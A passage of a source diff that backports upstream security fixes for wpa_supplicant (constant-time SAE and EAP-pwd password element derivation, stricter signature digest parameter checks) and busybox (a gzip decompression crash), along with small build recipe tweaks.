++ hdr.payload + hdr.length != da_end)) {
++ wpa_printf(MSG_DEBUG,
++ "PKCS #1: Unexpected digest algorithm parameters");
++ os_free(decrypted);
++ return -1;
++ }
+
+ if (!asn1_oid_equal(&oid, hash_alg)) {
+ char txt[100], txt2[100];
+diff --git a/src/tls/x509v3.c b/src/tls/x509v3.c
+index 1bd5aa0..bf2289f 100644
+--- a/src/tls/x509v3.c
++++ b/src/tls/x509v3.c
+@@ -1834,6 +1834,7 @@ int x509_check_signature(struct x509_certificate *issuer,
+ os_free(data);
+ return -1;
+ }
++ wpa_hexdump(MSG_MSGDUMP, "X509: DigestInfo", hdr.payload, hdr.length);
+
+ pos = hdr.payload;
+ end = pos + hdr.length;
+@@ -1855,6 +1856,8 @@ int x509_check_signature(struct x509_certificate *issuer,
+ os_free(data);
+ return -1;
+ }
++ wpa_hexdump(MSG_MSGDUMP, "X509: DigestAlgorithmIdentifier",
++ hdr.payload, hdr.length);
+ da_end = hdr.payload + hdr.length;
+
+ if (asn1_get_oid(hdr.payload, hdr.length, &oid, &next)) {
+@@ -1862,6 +1865,23 @@ int x509_check_signature(struct x509_certificate *issuer,
+ os_free(data);
+ return -1;
+ }
++ wpa_hexdump(MSG_MSGDUMP, "X509: Digest algorithm parameters",
++ next, da_end - next);
++
++ /*
++ * RFC 5754: The correct encoding for the SHA2 algorithms would be to
++ * omit the parameters, but there are implementation that encode these
++ * as a NULL element. Allow these two cases and reject anything else.
++ */
++ if (da_end > next &&
++ (asn1_get_next(next, da_end - next, &hdr) < 0 ||
++ !asn1_is_null(&hdr) ||
++ hdr.payload + hdr.length != da_end)) {
++ wpa_printf(MSG_DEBUG,
++ "X509: Unexpected digest algorithm parameters");
++ os_free(data);
++ return -1;
++ }
+
+ if (x509_sha1_oid(&oid)) {
+ if (signature->oid.oid[6] != 5 /* sha-1WithRSAEncryption */) {
+--
+2.17.1
+
diff --git a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2022-23303-4.patch b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2022-23303-4.patch
new file mode 100644
index 0000000000..21e65ba961
--- /dev/null
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2022-23303-4.patch
@@ -0,0 +1,609 @@
+From 208e5687ff2e48622e28d8888ce5444a54353bbd Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <jouni@codeaurora.org>
+Date: Tue, 27 Aug 2019 16:33:15 +0300
+Subject: [PATCH 1/4] crypto: Add more bignum/EC helper functions
+
+These are needed for implementing SAE hash-to-element.
+
+Signed-off-by: Jouni Malinen <jouni@codeaurora.org>
+
+Upstream-Status: Backport
+https://w1.fi/security/2022-1/
+
+CVE: CVE-2022-23303 CVE-2022-23304
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ src/crypto/crypto.h | 45 ++++++++++++++++++
+ src/crypto/crypto_openssl.c | 94 +++++++++++++++++++++++++++++++++++++
+ src/crypto/crypto_wolfssl.c | 66 ++++++++++++++++++++++++++
+ 3 files changed, 205 insertions(+)
+
+diff --git a/src/crypto/crypto.h b/src/crypto/crypto.h
+index 15f8ad04cea4..68476dbce96c 100644
+--- a/src/crypto/crypto.h
++++ b/src/crypto/crypto.h
+@@ -518,6 +518,13 @@ struct crypto_bignum * crypto_bignum_init(void);
+ */
+ struct crypto_bignum * crypto_bignum_init_set(const u8 *buf, size_t len);
+
++/**
++ * crypto_bignum_init_set - Allocate memory for bignum and set the value (uint)
++ * @val: Value to set
++ * Returns: Pointer to allocated bignum or %NULL on failure
++ */
++struct crypto_bignum * crypto_bignum_init_uint(unsigned int val);
++
+ /**
+ * crypto_bignum_deinit - Free bignum
+ * @n: Bignum from crypto_bignum_init() or crypto_bignum_init_set()
+@@ -612,6 +619,19 @@ int crypto_bignum_div(const struct crypto_bignum *a,
+ const struct crypto_bignum *b,
+ struct crypto_bignum *c);
+
++/**
++ * crypto_bignum_addmod - d = a + b (mod c)
++ * @a: Bignum
++ * @b: Bignum
++ * @c: Bignum
++ * @d: Bignum; used to store the result of (a + b) % c
++ * Returns: 0 on success, -1 on failure
++ */
++int crypto_bignum_addmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ const struct crypto_bignum *c,
++ struct crypto_bignum *d);
++
+ /**
+ * crypto_bignum_mulmod - d = a * b (mod c)
+ * @a: Bignum
+@@ -625,6 +645,28 @@ int crypto_bignum_mulmod(const struct crypto_bignum *a,
+ const struct crypto_bignum *c,
+ struct crypto_bignum *d);
+
++/**
++ * crypto_bignum_sqrmod - c = a^2 (mod b)
++ * @a: Bignum
++ * @b: Bignum
++ * @c: Bignum; used to store the result of a^2 % b
++ * Returns: 0 on success, -1 on failure
++ */
++int crypto_bignum_sqrmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ struct crypto_bignum *c);
++
++/**
++ * crypto_bignum_sqrtmod - returns sqrt(a) (mod b)
++ * @a: Bignum
++ * @b: Bignum
++ * @c: Bignum; used to store the result
++ * Returns: 0 on success, -1 on failure
++ */
++int crypto_bignum_sqrtmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ struct crypto_bignum *c);
++
+ /**
+ * crypto_bignum_rshift - r = a >> n
+ * @a: Bignum
+@@ -731,6 +773,9 @@ const struct crypto_bignum * crypto_ec_get_prime(struct crypto_ec *e);
+ */
+ const struct crypto_bignum * crypto_ec_get_order(struct crypto_ec *e);
+
++const struct crypto_bignum * crypto_ec_get_a(struct crypto_ec *e);
++const struct crypto_bignum * crypto_ec_get_b(struct crypto_ec *e);
++
+ /**
+ * struct crypto_ec_point - Elliptic curve point
+ *
+diff --git a/src/crypto/crypto_openssl.c b/src/crypto/crypto_openssl.c
+index bab33a537293..ed463105e8f1 100644
+--- a/src/crypto/crypto_openssl.c
++++ b/src/crypto/crypto_openssl.c
+@@ -1283,6 +1283,24 @@ struct crypto_bignum * crypto_bignum_init_set(const u8 *buf, size_t len)
+ }
+
+
++struct crypto_bignum * crypto_bignum_init_uint(unsigned int val)
++{
++ BIGNUM *bn;
++
++ if (TEST_FAIL())
++ return NULL;
++
++ bn = BN_new();
++ if (!bn)
++ return NULL;
++ if (BN_set_word(bn, val) != 1) {
++ BN_free(bn);
++ return NULL;
++ }
++ return (struct crypto_bignum *) bn;
++}
++
++
+ void crypto_bignum_deinit(struct crypto_bignum *n, int clear)
+ {
+ if (clear)
+@@ -1449,6 +1467,28 @@ int crypto_bignum_div(const struct crypto_bignum *a,
+ }
+
+
++int crypto_bignum_addmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ const struct crypto_bignum *c,
++ struct crypto_bignum *d)
++{
++ int res;
++ BN_CTX *bnctx;
++
++ if (TEST_FAIL())
++ return -1;
++
++ bnctx = BN_CTX_new();
++ if (!bnctx)
++ return -1;
++ res = BN_mod_add((BIGNUM *) d, (const BIGNUM *) a, (const BIGNUM *) b,
++ (const BIGNUM *) c, bnctx);
++ BN_CTX_free(bnctx);
++
++ return res ? 0 : -1;
++}
++
++
+ int crypto_bignum_mulmod(const struct crypto_bignum *a,
+ const struct crypto_bignum *b,
+ const struct crypto_bignum *c,
+@@ -1472,6 +1512,48 @@ int crypto_bignum_mulmod(const struct crypto_bignum *a,
+ }
+
+
++int crypto_bignum_sqrmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ struct crypto_bignum *c)
++{
++ int res;
++ BN_CTX *bnctx;
++
++ if (TEST_FAIL())
++ return -1;
++
++ bnctx = BN_CTX_new();
++ if (!bnctx)
++ return -1;
++ res = BN_mod_sqr((BIGNUM *) c, (const BIGNUM *) a, (const BIGNUM *) b,
++ bnctx);
++ BN_CTX_free(bnctx);
++
++ return res ? 0 : -1;
++}
++
++
++int crypto_bignum_sqrtmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ struct crypto_bignum *c)
++{
++ BN_CTX *bnctx;
++ BIGNUM *res;
++
++ if (TEST_FAIL())
++ return -1;
++
++ bnctx = BN_CTX_new();
++ if (!bnctx)
++ return -1;
++ res = BN_mod_sqrt((BIGNUM *) c, (const BIGNUM *) a, (const BIGNUM *) b,
++ bnctx);
++ BN_CTX_free(bnctx);
++
++ return res ? 0 : -1;
++}
++
++
+ int crypto_bignum_rshift(const struct crypto_bignum *a, int n,
+ struct crypto_bignum *r)
+ {
+@@ -1682,6 +1764,18 @@ const struct crypto_bignum * crypto_ec_get_order(struct crypto_ec *e)
+ }
+
+
++const struct crypto_bignum * crypto_ec_get_a(struct crypto_ec *e)
++{
++ return (const struct crypto_bignum *) e->a;
++}
++
++
++const struct crypto_bignum * crypto_ec_get_b(struct crypto_ec *e)
++{
++ return (const struct crypto_bignum *) e->b;
++}
++
++
+ void crypto_ec_point_deinit(struct crypto_ec_point *p, int clear)
+ {
+ if (clear)
+diff --git a/src/crypto/crypto_wolfssl.c b/src/crypto/crypto_wolfssl.c
+index 4cedab4367cd..e9894b335e53 100644
+--- a/src/crypto/crypto_wolfssl.c
++++ b/src/crypto/crypto_wolfssl.c
+@@ -1042,6 +1042,26 @@ struct crypto_bignum * crypto_bignum_init_set(const u8 *buf, size_t len)
+ }
+
+
++struct crypto_bignum * crypto_bignum_init_uint(unsigned int val)
++{
++ mp_int *a;
++
++ if (TEST_FAIL())
++ return NULL;
++
++ a = (mp_int *) crypto_bignum_init();
++ if (!a)
++ return NULL;
++
++ if (mp_set_int(a, val) != MP_OKAY) {
++ os_free(a);
++ a = NULL;
++ }
++
++ return (struct crypto_bignum *) a;
++}
++
++
+ void crypto_bignum_deinit(struct crypto_bignum *n, int clear)
+ {
+ if (!n)
+@@ -1168,6 +1188,19 @@ int crypto_bignum_div(const struct crypto_bignum *a,
+ }
+
+
++int crypto_bignum_addmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ const struct crypto_bignum *c,
++ struct crypto_bignum *d)
++{
++ if (TEST_FAIL())
++ return -1;
++
++ return mp_addmod((mp_int *) a, (mp_int *) b, (mp_int *) c,
++ (mp_int *) d) == MP_OKAY ? 0 : -1;
++}
++
++
+ int crypto_bignum_mulmod(const struct crypto_bignum *a,
+ const struct crypto_bignum *b,
+ const struct crypto_bignum *m,
+@@ -1181,6 +1214,27 @@ int crypto_bignum_mulmod(const struct crypto_bignum *a,
+ }
+
+
++int crypto_bignum_sqrmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ struct crypto_bignum *c)
++{
++ if (TEST_FAIL())
++ return -1;
++
++ return mp_sqrmod((mp_int *) a, (mp_int *) b,
++ (mp_int *) c) == MP_OKAY ? 0 : -1;
++}
++
++
++int crypto_bignum_sqrtmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ struct crypto_bignum *c)
++{
++ /* TODO */
++ return -1;
++}
++
++
+ int crypto_bignum_rshift(const struct crypto_bignum *a, int n,
+ struct crypto_bignum *r)
+ {
+@@ -1386,6 +1440,18 @@ const struct crypto_bignum * crypto_ec_get_order(struct crypto_ec *e)
+ }
+
+
++const struct crypto_bignum * crypto_ec_get_a(struct crypto_ec *e)
++{
++ return (const struct crypto_bignum *) &e->a;
++}
++
++
++const struct crypto_bignum * crypto_ec_get_b(struct crypto_ec *e)
++{
++ return (const struct crypto_bignum *) &e->b;
++}
++
++
+ void crypto_ec_point_deinit(struct crypto_ec_point *p, int clear)
+ {
+ ecc_point *point = (ecc_point *) p;
+--
+2.25.1
+
+From 2232d3d5f188b65dbb6c823ac62175412739eb16 Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <j@w1.fi>
+Date: Fri, 7 Jan 2022 13:47:16 +0200
+Subject: [PATCH 2/4] dragonfly: Add sqrt() helper function
+
+This is a backport of "SAE: Move sqrt() implementation into a helper
+function" to introduce the helper function needed for the following
+patches.
+
+Signed-off-by: Jouni Malinen <j@w1.fi>
+---
+ src/common/dragonfly.c | 34 ++++++++++++++++++++++++++++++++++
+ src/common/dragonfly.h | 2 ++
+ 2 files changed, 36 insertions(+)
+
+diff --git a/src/common/dragonfly.c b/src/common/dragonfly.c
+index 547be66f1561..1e842716668e 100644
+--- a/src/common/dragonfly.c
++++ b/src/common/dragonfly.c
+@@ -213,3 +213,37 @@ int dragonfly_generate_scalar(const struct crypto_bignum *order,
+ "dragonfly: Unable to get randomness for own scalar");
+ return -1;
+ }
++
++
++/* res = sqrt(val) */
++int dragonfly_sqrt(struct crypto_ec *ec, const struct crypto_bignum *val,
++ struct crypto_bignum *res)
++{
++ const struct crypto_bignum *prime;
++ struct crypto_bignum *tmp, *one;
++ int ret = 0;
++ u8 prime_bin[DRAGONFLY_MAX_ECC_PRIME_LEN];
++ size_t prime_len;
++
++ /* For prime p such that p = 3 mod 4, sqrt(w) = w^((p+1)/4) mod p */
++
++ prime = crypto_ec_get_prime(ec);
++ prime_len = crypto_ec_prime_len(ec);
++ tmp = crypto_bignum_init();
++ one = crypto_bignum_init_uint(1);
++
++ if (crypto_bignum_to_bin(prime, prime_bin, sizeof(prime_bin),
++ prime_len) < 0 ||
++ (prime_bin[prime_len - 1] & 0x03) != 3 ||
++ !tmp || !one ||
++ /* tmp = (p+1)/4 */
++ crypto_bignum_add(prime, one, tmp) < 0 ||
++ crypto_bignum_rshift(tmp, 2, tmp) < 0 ||
++ /* res = sqrt(val) */
++ crypto_bignum_exptmod(val, tmp, prime, res) < 0)
++ ret = -1;
++
++ crypto_bignum_deinit(tmp, 0);
++ crypto_bignum_deinit(one, 0);
++ return ret;
++}
+diff --git a/src/common/dragonfly.h b/src/common/dragonfly.h
+index ec3dd593eda4..84d67f575c54 100644
+--- a/src/common/dragonfly.h
++++ b/src/common/dragonfly.h
+@@ -27,5 +27,7 @@ int dragonfly_generate_scalar(const struct crypto_bignum *order,
+ struct crypto_bignum *_rand,
+ struct crypto_bignum *_mask,
+ struct crypto_bignum *scalar);
++int dragonfly_sqrt(struct crypto_ec *ec, const struct crypto_bignum *val,
++ struct crypto_bignum *res);
+
+ #endif /* DRAGONFLY_H */
+--
+2.25.1
+
+From fe534b0baaa8c0e6ddeb24cf529d6e50e33dc501 Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <j@w1.fi>
+Date: Fri, 7 Jan 2022 13:47:16 +0200
+Subject: [PATCH 3/4] SAE: Derive the y coordinate for PWE with own
+ implementation
+
+The crypto_ec_point_solve_y_coord() wrapper function might not use
+constant time operations in the crypto library and as such, could leak
+side channel information about the password that is used to generate the
+PWE in the hunting and pecking loop. As such, calculate the two possible
+y coordinate values and pick the correct one to use with constant time
+selection.
+
+Signed-off-by: Jouni Malinen <j@w1.fi>
+---
+ src/common/sae.c | 47 +++++++++++++++++++++++++++++++++--------------
+ 1 file changed, 33 insertions(+), 14 deletions(-)
+
+diff --git a/src/common/sae.c b/src/common/sae.c
+index 08fdbfd18173..8d79ed962768 100644
+--- a/src/common/sae.c
++++ b/src/common/sae.c
+@@ -286,14 +286,16 @@ static int sae_derive_pwe_ecc(struct sae_data *sae, const u8 *addr1,
+ int pwd_seed_odd = 0;
+ u8 prime[SAE_MAX_ECC_PRIME_LEN];
+ size_t prime_len;
+- struct crypto_bignum *x = NULL, *qr = NULL, *qnr = NULL;
++ struct crypto_bignum *x = NULL, *y = NULL, *qr = NULL, *qnr = NULL;
+ u8 x_bin[SAE_MAX_ECC_PRIME_LEN];
+ u8 x_cand_bin[SAE_MAX_ECC_PRIME_LEN];
+ u8 qr_bin[SAE_MAX_ECC_PRIME_LEN];
+ u8 qnr_bin[SAE_MAX_ECC_PRIME_LEN];
++ u8 x_y[2 * SAE_MAX_ECC_PRIME_LEN];
+ int res = -1;
+ u8 found = 0; /* 0 (false) or 0xff (true) to be used as const_time_*
+ * mask */
++ unsigned int is_eq;
+
+ os_memset(x_bin, 0, sizeof(x_bin));
+
+@@ -402,25 +404,42 @@ static int sae_derive_pwe_ecc(struct sae_data *sae, const u8 *addr1,
+ goto fail;
+ }
+
+- if (!sae->tmp->pwe_ecc)
+- sae->tmp->pwe_ecc = crypto_ec_point_init(sae->tmp->ec);
+- if (!sae->tmp->pwe_ecc)
+- res = -1;
+- else
+- res = crypto_ec_point_solve_y_coord(sae->tmp->ec,
+- sae->tmp->pwe_ecc, x,
+- pwd_seed_odd);
+- if (res < 0) {
+- /*
+- * This should not happen since we already checked that there
+- * is a result.
+- */
++ /* y = sqrt(x^3 + ax + b) mod p
++ * if LSB(save) == LSB(y): PWE = (x, y)
++ * else: PWE = (x, p - y)
++ *
++ * Calculate y and the two possible values for PWE and after that,
++ * use constant time selection to copy the correct alternative.
++ */
++ y = crypto_ec_point_compute_y_sqr(sae->tmp->ec, x);
++ if (!y ||
++ dragonfly_sqrt(sae->tmp->ec, y, y) < 0 ||
++ crypto_bignum_to_bin(y, x_y, SAE_MAX_ECC_PRIME_LEN,
++ prime_len) < 0 ||
++ crypto_bignum_sub(sae->tmp->prime, y, y) < 0 ||
++ crypto_bignum_to_bin(y, x_y + SAE_MAX_ECC_PRIME_LEN,
++ SAE_MAX_ECC_PRIME_LEN, prime_len) < 0) {
+ wpa_printf(MSG_DEBUG, "SAE: Could not solve y");
++ goto fail;
++ }
++
++ is_eq = const_time_eq(pwd_seed_odd, x_y[prime_len - 1] & 0x01);
++ const_time_select_bin(is_eq, x_y, x_y + SAE_MAX_ECC_PRIME_LEN,
++ prime_len, x_y + prime_len);
++ os_memcpy(x_y, x_bin, prime_len);
++ wpa_hexdump_key(MSG_DEBUG, "SAE: PWE", x_y, 2 * prime_len);
++ crypto_ec_point_deinit(sae->tmp->pwe_ecc, 1);
++ sae->tmp->pwe_ecc = crypto_ec_point_from_bin(sae->tmp->ec, x_y);
++ if (!sae->tmp->pwe_ecc) {
++ wpa_printf(MSG_DEBUG, "SAE: Could not generate PWE");
++ res = -1;
+ }
+
+ fail:
++ forced_memzero(x_y, sizeof(x_y));
+ crypto_bignum_deinit(qr, 0);
+ crypto_bignum_deinit(qnr, 0);
++ crypto_bignum_deinit(y, 1);
+ os_free(dummy_password);
+ bin_clear_free(tmp_password, password_len);
+ crypto_bignum_deinit(x, 1);
+--
+2.25.1
+
+From 603cd880e7f90595482658a7136fa6a7be5cb485 Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <j@w1.fi>
+Date: Fri, 7 Jan 2022 18:52:27 +0200
+Subject: [PATCH 4/4] EAP-pwd: Derive the y coordinate for PWE with own
+ implementation
+
+The crypto_ec_point_solve_y_coord() wrapper function might not use
+constant time operations in the crypto library and as such, could leak
+side channel information about the password that is used to generate the
+PWE in the hunting and pecking loop. As such, calculate the two possible
+y coordinate values and pick the correct one to use with constant time
+selection.
+
+Signed-off-by: Jouni Malinen <j@w1.fi>
+---
+ src/eap_common/eap_pwd_common.c | 46 ++++++++++++++++++++++++++-------
+ 1 file changed, 36 insertions(+), 10 deletions(-)
+
+diff --git a/src/eap_common/eap_pwd_common.c b/src/eap_common/eap_pwd_common.c
+index 2b2b8efdbd01..ff22b29b087a 100644
+--- a/src/eap_common/eap_pwd_common.c
++++ b/src/eap_common/eap_pwd_common.c
+@@ -127,7 +127,8 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ u8 qr_or_qnr_bin[MAX_ECC_PRIME_LEN];
+ u8 x_bin[MAX_ECC_PRIME_LEN];
+ u8 prime_bin[MAX_ECC_PRIME_LEN];
+- struct crypto_bignum *tmp2 = NULL;
++ u8 x_y[2 * MAX_ECC_PRIME_LEN];
++ struct crypto_bignum *tmp2 = NULL, *y = NULL;
+ struct crypto_hash *hash;
+ unsigned char pwe_digest[SHA256_MAC_LEN], *prfbuf = NULL, ctr;
+ int ret = 0, res;
+@@ -139,6 +140,7 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ u8 found_ctr = 0, is_odd = 0;
+ int cmp_prime;
+ unsigned int in_range;
++ unsigned int is_eq;
+
+ if (grp->pwe)
+ return -1;
+@@ -151,11 +153,6 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ if (crypto_bignum_to_bin(prime, prime_bin, sizeof(prime_bin),
+ primebytelen) < 0)
+ return -1;
+- grp->pwe = crypto_ec_point_init(grp->group);
+- if (!grp->pwe) {
+- wpa_printf(MSG_INFO, "EAP-pwd: unable to create bignums");
+- goto fail;
+- }
+
+ if ((prfbuf = os_malloc(primebytelen)) == NULL) {
+ wpa_printf(MSG_INFO, "EAP-pwd: unable to malloc space for prf "
+@@ -261,10 +258,37 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ */
+ crypto_bignum_deinit(x_candidate, 1);
+ x_candidate = crypto_bignum_init_set(x_bin, primebytelen);
+- if (!x_candidate ||
+- crypto_ec_point_solve_y_coord(grp->group, grp->pwe, x_candidate,
+- is_odd) != 0) {
+- wpa_printf(MSG_INFO, "EAP-pwd: Could not solve for y");
++ if (!x_candidate)
++ goto fail;
++
++ /* y = sqrt(x^3 + ax + b) mod p
++ * if LSB(y) == LSB(pwd-seed): PWE = (x, y)
++ * else: PWE = (x, p - y)
++ *
++ * Calculate y and the two possible values for PWE and after that,
++ * use constant time selection to copy the correct alternative.
++ */
++ y = crypto_ec_point_compute_y_sqr(grp->group, x_candidate);
++ if (!y ||
++ dragonfly_sqrt(grp->group, y, y) < 0 ||
++ crypto_bignum_to_bin(y, x_y, MAX_ECC_PRIME_LEN, primebytelen) < 0 ||
++ crypto_bignum_sub(prime, y, y) < 0 ||
++ crypto_bignum_to_bin(y, x_y + MAX_ECC_PRIME_LEN,
++ MAX_ECC_PRIME_LEN, primebytelen) < 0) {
++ wpa_printf(MSG_DEBUG, "SAE: Could not solve y");
++ goto fail;
++ }
++
++ /* Constant time selection of the y coordinate from the two
++ * options */
++ is_eq = const_time_eq(is_odd, x_y[primebytelen - 1] & 0x01);
++ const_time_select_bin(is_eq, x_y, x_y + MAX_ECC_PRIME_LEN,
++ primebytelen, x_y + primebytelen);
++ os_memcpy(x_y, x_bin, primebytelen);
++ wpa_hexdump_key(MSG_DEBUG, "EAP-pwd: PWE", x_y, 2 * primebytelen);
++ grp->pwe = crypto_ec_point_from_bin(grp->group, x_y);
++ if (!grp->pwe) {
++ wpa_printf(MSG_DEBUG, "EAP-pwd: Could not generate PWE");
+ goto fail;
+ }
+
+@@ -289,6 +313,7 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ /* cleanliness and order.... */
+ crypto_bignum_deinit(x_candidate, 1);
+ crypto_bignum_deinit(tmp2, 1);
++ crypto_bignum_deinit(y, 1);
+ crypto_bignum_deinit(qr, 1);
+ crypto_bignum_deinit(qnr, 1);
+ bin_clear_free(prfbuf, primebytelen);
+@@ -296,6 +321,7 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ os_memset(qnr_bin, 0, sizeof(qnr_bin));
+ os_memset(qr_or_qnr_bin, 0, sizeof(qr_or_qnr_bin));
+ os_memset(pwe_digest, 0, sizeof(pwe_digest));
++ forced_memzero(x_y, sizeof(x_y));
+
+ return ret;
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb
index 7cc03fef7d..a8fb34b1a1 100644
--- a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb
@@ -1,5 +1,6 @@
SUMMARY = "Client for Wi-Fi Protected Access (WPA)"
HOMEPAGE = "http://w1.fi/wpa_supplicant/"
+DESCRIPTION = "wpa_supplicant is a WPA Supplicant for Linux, BSD, Mac OS X, and Windows with support for WPA and WPA2 (IEEE 802.11i / RSN). Supplicant is the IEEE 802.1X/WPA component that is used in the client stations. It implements key negotiation with a WPA Authenticator and it controls the roaming and IEEE 802.11 authentication/association of the wlan driver."
BUGTRACKER = "http://w1.fi/security/"
SECTION = "network"
LICENSE = "BSD-3-Clause"
@@ -29,6 +30,10 @@ SRC_URI = "http://w1.fi/releases/wpa_supplicant-${PV}.tar.gz \
file://0001-WPS-UPnP-Do-not-allow-event-subscriptions-with-URLs-.patch \
file://0002-WPS-UPnP-Fix-event-message-generation-using-a-long-U.patch \
file://0003-WPS-UPnP-Handle-HTTP-initiation-failures-for-events-.patch \
+ file://CVE-2021-0326.patch \
+ file://CVE-2021-27803.patch \
+ file://CVE-2021-30004.patch \
+ file://CVE-2022-23303-4.patch \
"
SRC_URI[md5sum] = "2d2958c782576dc9901092fbfecb4190"
SRC_URI[sha256sum] = "fcbdee7b4a64bea8177973299c8c824419c413ec2e3a95db63dd6a5dc3541f17"
diff --git a/meta/recipes-core/base-files/base-files/hosts b/meta/recipes-core/base-files/base-files/hosts
index b94f414d5c..10a5b6c704 100644
--- a/meta/recipes-core/base-files/base-files/hosts
+++ b/meta/recipes-core/base-files/base-files/hosts
@@ -1,4 +1,4 @@
-127.0.0.1 localhost.localdomain localhost
+127.0.0.1 localhost
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
diff --git a/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb b/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb
index d01cd7e297..65b3cd778d 100644
--- a/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb
+++ b/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb
@@ -1,5 +1,6 @@
SUMMARY = "Base system master password/group files"
DESCRIPTION = "The master copies of the user database files (/etc/passwd and /etc/group). The update-passwd tool is also provided to keep the system databases synchronized with these master files."
+HOMEPAGE = "https://launchpad.net/base-passwd"
SECTION = "base"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=eb723b61539feef013de476e68b5c50a"
diff --git a/meta/recipes-core/busybox/busybox.inc b/meta/recipes-core/busybox/busybox.inc
index e0522be729..f0c5666f47 100644
--- a/meta/recipes-core/busybox/busybox.inc
+++ b/meta/recipes-core/busybox/busybox.inc
@@ -139,6 +139,10 @@ do_configure () {
do_prepare_config
merge_config.sh -m .config ${@" ".join(find_cfgs(d))}
cml1_do_configure
+
+ # Save a copy of .config and autoconf.h.
+ cp .config .config.orig
+ cp include/autoconf.h include/autoconf.h.orig
}
do_compile() {
@@ -146,13 +150,17 @@ do_compile() {
if [ "${BUILD_REPRODUCIBLE_BINARIES}" = "1" ]; then
export KCONFIG_NOTIMESTAMP=1
fi
+
+ # Ensure we start do_compile with the original .config and autoconf.h.
+ # These files should always have matching timestamps.
+ cp .config.orig .config
+ cp include/autoconf.h.orig include/autoconf.h
+
if [ "${BUSYBOX_SPLIT_SUID}" = "1" -a x`grep "CONFIG_FEATURE_INDIVIDUAL=y" .config` = x ]; then
+ # Guard againt interrupted do_compile: clean temporary files.
+ rm -f .config.app.suid .config.app.nosuid .config.disable.apps .config.nonapps
+
# split the .config into two parts, and make two busybox binaries
- if [ -e .config.orig ]; then
- # Need to guard again an interrupted do_compile - restore any backup
- cp .config.orig .config
- fi
- cp .config .config.orig
oe_runmake busybox.cfg.suid
oe_runmake busybox.cfg.nosuid
@@ -189,15 +197,18 @@ do_compile() {
bbfatal "busybox suid binary incorrectly provides /bin/sh"
fi
- # copy .config.orig back to .config, because the install process may check this file
- cp .config.orig .config
# cleanup
- rm .config.orig .config.app.suid .config.app.nosuid .config.disable.apps .config.nonapps
+ rm .config.app.suid .config.app.nosuid .config.disable.apps .config.nonapps
else
oe_runmake busybox_unstripped
cp busybox_unstripped busybox
oe_runmake busybox.links
fi
+
+ # restore original .config and autoconf.h, because the install process
+ # may check these files
+ cp .config.orig .config
+ cp include/autoconf.h.orig include/autoconf.h
}
do_install () {
@@ -348,7 +359,7 @@ do_install_ptest () {
# These access the internet which is not guaranteed to work on machines running the tests
rm -rf ${D}${PTEST_PATH}/testsuite/wget
sort ${B}/.config > ${D}${PTEST_PATH}/.config
- ln -s /bin/busybox ${D}${PTEST_PATH}/busybox
+ ln -s ${base_bindir}/busybox ${D}${PTEST_PATH}/busybox
}
inherit update-alternatives
diff --git a/meta/recipes-core/busybox/busybox/0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch b/meta/recipes-core/busybox/busybox/0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch
new file mode 100644
index 0000000000..b75f0907e7
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch
@@ -0,0 +1,51 @@
+From fe791386ebc270219ca00406c9fdadc5130b64ee Mon Sep 17 00:00:00 2001
+From: Samuel Sapalski <samuel.sapalski@nokia.com>
+Date: Wed, 3 Mar 2021 16:31:22 +0100
+Subject: [PATCH] decompress_gunzip: Fix DoS if gzip is corrupt
+
+On certain corrupt gzip files, huft_build will set the error bit on
+the result pointer. If afterwards abort_unzip is called huft_free
+might run into a segmentation fault or an invalid pointer to
+free(p).
+
+In order to mitigate this, we check in huft_free if the error bit
+is set and clear it before the linked list is freed.
+
+Signed-off-by: Samuel Sapalski <samuel.sapalski@nokia.com>
+Signed-off-by: Peter Kaestle <peter.kaestle@nokia.com>
+Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-28831
+Comment: One hunk from this patch is removed as it was not relevant.
+Signed-off-by: Chen Qi <Qi.Chen@windriver.com>
+Signed-off-by: Akash Hadke <Akash.Hadke@kpit.com>
+---
+ archival/libarchive/decompress_gunzip.c | 12 ++++++++++--
+ 1 file changed, 10 insertions(+), 2 deletions(-)
+
+diff --git a/archival/libarchive/decompress_gunzip.c b/archival/libarchive/decompress_gunzip.c
+index eb3b64930..e93cd5005 100644
+--- a/archival/libarchive/decompress_gunzip.c
++++ b/archival/libarchive/decompress_gunzip.c
